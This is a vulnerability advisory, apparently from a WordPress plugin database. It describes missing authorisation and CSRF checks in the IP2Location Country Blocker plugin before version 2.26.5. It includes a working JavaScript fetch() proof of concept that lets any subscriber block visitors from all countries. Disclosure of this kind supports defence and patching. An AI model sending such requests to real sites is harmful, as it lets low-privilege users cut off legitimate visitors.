WordPress Plugin Vulnerabilities
IP2Location Country Blocker < 2.26.5 - Subscriber+ Arbitrary Country Ban
Description
The plugin does not have authorisation and CSRF checks in the ip2location_country_blocker_save_rules AJAX action, allowing any authenticated users, such as subscriber to call it and block arbitrary country, or block all of them at once, preventing users from accessing the frontend. v2.26.5 added authorisation but not CSRF check, a separate issue has been created
Proof of Concept
Ban visitors from all countries, as a subscriber:
fetch("https://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": new URLSearchParams({"action":"ip2location_country_blocker_save_rules", "countries[]": "nonexistent", "mode": 0}),
"method": "POST",
"credentials": "include"
})
.then(response => response.text())
.then(function(data) { console.log(data); }); Affects Plugins
Fixed in version 2.26.5
References
Classification
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
Timeline
Publicly Published
2022-01-06 (about 4 months ago)
Added
2022-01-06 (about 4 months ago)
Last Updated
2022-04-08 (about 1 months ago)